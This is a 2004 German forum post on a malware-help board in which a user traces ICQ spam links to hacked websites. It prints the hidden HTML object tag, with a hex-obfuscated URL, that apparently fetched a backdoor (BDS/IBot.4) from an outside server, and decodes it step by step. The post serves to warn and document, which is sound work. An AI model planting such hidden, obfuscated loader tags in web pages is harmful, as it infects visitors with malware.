| |
| |||||||
Plagegeister aller Art und deren Bekämpfung: Seltsame Odyssee bei ICQWindows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen. |
 |
09.01.2004, 23:21
| #1 |
| |  Seltsame Odyssee bei ICQ Folgendes merkwürdige Verhalten ist mir nun schon zum zweiten Mal in Zusammenhang mit ICQ aufgefallen. Da ich darüber noch nichts gefunden habe, will ich es an dieser Stelle einfach mal dokumentieren. Vielleicht hilfts ja jemandem. Es beginnt mit einer Spam-Message von einer Person mit deutsch klingendem Namen, welche jedoch nicht im Stande ist, einen aus drei Worten bestehenden Satz fehlerfrei zu schreiben. Die Nachricht enthält einen Link auf eine Website, wo sich ein Bild der Person befinden soll. Diese Websiten sind jedoch offensichtlich gehackt. So befand sich im folgenden näher beschriebene Datei unterhalb der Indexseite einer Möbeltischlereifirma. (Diese habe ich kontaktiert, worauf sie die untergejubelten Dateien entfernte, es jedoch nicht für nötig hielt, sich bei mir für diesen Hinweis zu bedanken.) Die heutige Spam-Nachricht enthielt einen Link auf die Seite http://www.timelessimages.com/myface3.html. myface3.html enthält diesen Code: </font><blockquote>Code:</font><hr /><pre style="font-size:x-small; font-family: monospace;"> <html> <font face="System"> <object STYLE="display:none" DATA="http://%25%37%37%25%36%35%25%36%32%2....php"> </object></pre>[/QUOTE]Wie unschwer zu erkennen ist, ist die URL schlecht getarnt, indem die Einzelzeichen in hexadezimaler Schreibweise geschrieben wurde. Übersetzt ergibt sich folgende URL: </font><blockquote>Code:</font><hr /><pre style="font-size:x-small; font-family: monospace;">http://%77%65%62%32%31%36%2E%62%65%72%6C%69%6E%32%34%30%2E%73%65%72%76er4free.de/hp/fight/dn.php</pre>[/QUOTE]Immer noch teilweise Hexadezimal. Also den Rest nochmal umwandeln: </font><blockquote>Code:</font><hr /><pre style="font-size:x-small; font-family: monospace;">http://web216.berlin240.server4free.de/hp/fight/dn.php</pre>[/QUOTE]Diese URL hat folgende IP: 217.172.191.201 Löst man diese IP wieder auf, erhält man folgende URL: serverkiller.intergenia.de Diese IP ist übrigens gegenwärtig nicht erreichbar, weswegen ich nicht feststellen konnte, was auf diesem Wege verbreitet werden sollte. Im ersten Fall, vor 14 Tagen, war es jedenfalls ein Backdoorprogramm namens BDS/IBot.4. [ 10. Januar 2004, 08:23: Beitrag editiert von: Xerxes ] |
|
| Themen zu Seltsame Odyssee bei ICQ |
| backdoorprogramm, bild, code, data, datei, dateien, deutsch, einfach, erkennen, erreichbar, folge, folgendes, hinweis, icq, januar, kontaktiert, link, namen, namens, nichts, object, schwer, system, tiere, verhalten |
Linear-Darstellung
